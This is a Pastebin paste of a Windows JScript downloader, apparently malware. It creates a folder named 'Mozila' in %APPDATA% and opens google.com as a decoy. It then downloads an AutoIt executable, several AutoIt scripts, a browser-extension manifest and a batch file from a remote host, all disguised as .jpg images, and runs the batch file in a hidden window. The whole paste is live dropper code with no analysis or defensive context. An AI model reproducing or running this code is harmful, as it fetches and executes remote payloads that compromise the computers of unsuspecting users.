Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- (function(ax) {
- function download(url, dest, position) {
- if (!dest || !url) {
- return null;
- }
- var wso = WScript.CreateObject("Msxml2.XMLhttp");
- wso["onreadystatechange"] = function() {
- if (wso["readyState"] === 4 && wso["status"] === 200) {
- xa = new ActiveXObject("ADODB.Stream");
- xa["open"]();
- xa["type"] = 1;
- xa["write"](wso.ResponseBody);
- xa["position"] = position;
- stm2 = new ActiveXObject("ADODB.Stream");
- stm2["type"] = 1;
- stm2["open"]();
- stm2["write"](xa["read"]());
- stm2["saveToFile"](dest, 2);
- stm2["close"]();
- xa["close"]();
- }
- };
- wso["open"]("GET", url, false);
- wso["send"](null);
- }
- // Dead code:
- // function _0xc4a4x6(a, b) {
- // {
- // xa = new ActiveXObject("ADODB.Stream");
- // xa["open"]();
- // xa["type"] = 1;
- // xa.LoadFromFile(a);
- // ix = new ActiveXObject("ADODB.Stream");
- // ix["open"]();
- // ix["type"] = 1;
- // ix.LoadFromFile(b);
- // stm2 = new ActiveXObject("ADODB.Stream");
- // stm2["type"] = 1;
- // stm2["open"]();
- // stm2["write"](ix["read"]());
- // stm2["write"](xa["read"]());
- // xa["close"]();
- // ix["close"]();
- // stm2["saveToFile"](a, 2);
- // stm2["close"]();
- // }
- // }
- fso = new ActiveXObject("Scripting.FileSystemObject");
- var wss = new ActiveXObject("WScript.Shell");
- ax = new ActiveXObject("Shell.Application");
- FileDestr = wss["ExpandEnvironmentStrings"]("%APPDATA%\\");
- mozklasor = FileDestr + "Mozila";
- if (!fso.FolderExists(mozklasor)) {
- fso.CreateFolder(mozklasor);
- }
- ax.ShellExecute("https://www.google.com");
- download("http://userexperiencestatics.net/ext/Autoit.jpg", mozklasor + "\\autoit.exe", 0);
- download("http://userexperiencestatics.net/ext/bg.jpg", mozklasor + "\\bg.js", 0);
- download("http://userexperiencestatics.net/ext/ekl.jpg", mozklasor + "\\ekl.au3", 0);
- download("http://userexperiencestatics.net/ext/ff.jpg", mozklasor + "\\ff.zip", 0);
- download("http://userexperiencestatics.net/ext/force.jpg", mozklasor + "\\force.au3", 0);
- download("http://userexperiencestatics.net/ext/sabit.jpg", mozklasor + "\\sabit.au3", 0);
- download("http://userexperiencestatics.net/ext/manifest.jpg", mozklasor + "\\manifest.json", 0);
- download("http://userexperiencestatics.net/ext/run.jpg", mozklasor + "\\run.bat", 0);
- download("http://userexperiencestatics.net/ext/up.jpg", mozklasor + "\\up.au3", 0);
- download("http://whos.amung.us/pingjs/?k=pingjse346", mozklasor + "\\ping.js", 0);
- download("http://whos.amung.us/pingjs/?k=pingjse3462", mozklasor + "\\ping2.js", 0);
- ax.ShellExecute(mozklasor + "\\run.bat", "", mozklasor, "", 0);
- })(this);
Add Comment
Please, Sign In to add comment